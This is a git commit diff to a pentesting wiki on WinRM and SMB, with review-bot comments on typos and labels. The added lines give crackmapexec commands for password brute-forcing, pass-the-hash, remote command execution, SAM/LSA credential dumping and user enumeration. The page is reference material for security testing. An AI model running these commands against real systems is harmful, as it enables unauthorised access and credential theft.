GitBook: [master] 3 pages modified
This commit is contained in:
parent
fc1853d121
commit
7f9b1cdbe1
@ -330,6 +330,12 @@ patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x
|
|||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||||
```
|
||||
|
||||
### Winrm
|
||||
|
||||
```bash
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
```
|
||||
|
||||
## Local
|
||||
|
||||
### Online cracking databases
|
||||
|
|
|
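Review bot: the new `### Winrm` block uses the placeholder `<Domain Name>`, which contains a space and will be word-split by the shell if a reader copies the line verbatim; the rest of this page writes the domain placeholder as `<DOMAIN>`, so `crackmapexec winrm <IP> -d <DOMAIN> -u usernames.txt -p passwords.txt` keeps the convention. Consider also a one-line comment that a username/password list against WinRM is a password-spraying run and will trip domain lockout thresholds, since the `pgsql-brute` block just above carries no such hint either.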
@ -121,6 +121,18 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
|||
|
||||
## WinRM connection in linux
|
||||
|
||||
### Brut Force
|
||||
|
||||
```ruby
|
||||
#Brute force
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
|
||||
#Just check a pair of credentials
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password>
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH>
|
||||
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
|
||||
```
|
||||
|
||||
### Using evil-winrm
|
||||
|
||||
```ruby
|
||||
|
|
|
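Review bot: the added `### Brut Force` heading should read `### Brute Force` (and `## WinRM connection in linux` should capitalize `Linux`), and the fence is tagged ```` ```ruby ```` although every line inside it is a shell command; the other blocks on this page use ```` ```bash ````, so tag it the same way or the syntax highlighting will be wrong. The closing comment ("won't give you an interactive shell, but it will check if the creds are valid") is the useful part of the hunk and could sit above the commands rather than after them.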
@ -174,6 +174,7 @@ smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
|
|||
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
|
||||
crackmapexec smb <IP> -u '' -p '' --shares #Null user
|
||||
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
|
||||
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
|
||||
```
|
||||
|
||||
### **Connect/List a shared folder**
|
||||
|
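Review bot: the added line `crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user` is a pass-the-hash authentication with a named account, not a guest login, and the same mislabel already sits on the `-p 'password'` line above it; the `smbmap` line earlier in the hunk tags the equivalent form `#Pass-the-Hash`, so use that (and `#Authenticated user` for the password line) so readers can tell the three forms apart.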
@ -268,11 +269,11 @@ smbclient //<IP>/<share>
|
|||
Commands:
|
||||
|
||||
* mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\)
|
||||
* resurse: toggles recursion on \(default: off\)
|
||||
* prompt: toggles prompting for filesnames off \(default: on\)
|
||||
* recurse: toggles recursion on \(default: off\)
|
||||
* prompt: toggles prompting for filenames off \(default: on\)
|
||||
* mget: copies all files matching the mask from host to client machine
|
||||
|
||||
\(Information from the manpage of smbclient\)
|
||||
\(_Information from the manpage of smbclient_\)
|
||||
|
||||
## Authenticate using Kerberos
|
||||
|
||||
|
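Review bot: the typo fixes (`resurse` to `recurse`, `filesnames` to `filenames`) and the italicized manpage attribution are fine; one thing this hunk could also pick up is the `mask` bullet, where `"" for all files` looks like a `"*"` whose asterisk was eaten by markdown, since an empty mask does not mean "all files" in smbclient. Writing it as `"\*"` would match the escaping used for the parentheses on the same lines.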
@ -287,19 +288,29 @@ rpcclient -k ws01win10.domain.com
|
|||
|
||||
### **crackmapexec**
|
||||
|
||||
crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
|
||||
|
||||
```bash
|
||||
apt-get install crackmapexec
|
||||
|
||||
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||||
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||||
crackmapexec 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||||
# Using --exec-method -1,2,3 wmiexec,atexec,smbexec
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||||
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
|
||||
|
||||
crackmapexec -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||||
crackmapexec -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||||
```
|
||||
|
||||
### \*\*\*\*[**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)\*\*\*\*
|
||||
### [**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)
|
||||
|
||||
Both options will **create a new service** \(using _\pipe\svcctl_ via SMB\) in the victim machine and use it to **execute something** \(**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-\).
|
||||
**More info** about [**psexec** ](../windows/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows/ntlm/smbexec.md).
|
||||
|
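Review bot: the rewrite of the `--exec-method` comment and the addition of the `smb` protocol keyword and `<IP>` are correct, but the hunk carries over `#Excute cmd` and `#Dump LSASS in memmory hashes` unchanged, and the new line `--sessions #Get sessions (` ends with an unclosed parenthesis; suggest `#Execute cmd`, `#Dump LSA secrets / in-memory hashes` and `#Get sessions`. The first `-X`/`-x` lines are also the only ones in the block without `-d <DOMAIN>`, which is worth making consistent with the enumeration lines below them.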
@ -362,7 +373,7 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
|
|||
## SMB relay attack
|
||||
|
||||
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.
|
||||
[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
|
||||
[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
|
||||
## SMB-Trap
|
||||
|
||||
|
|
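Review bot: removing the stray `\*\*\*\*` after the link is right. The sentence above it still says a successful relay "will automatically drop you into a system shell", which is only true when the relayed account has administrative rights on the target and the target does not require SMB signing; qualifying it there would keep the section from overstating what the linked page actually describes.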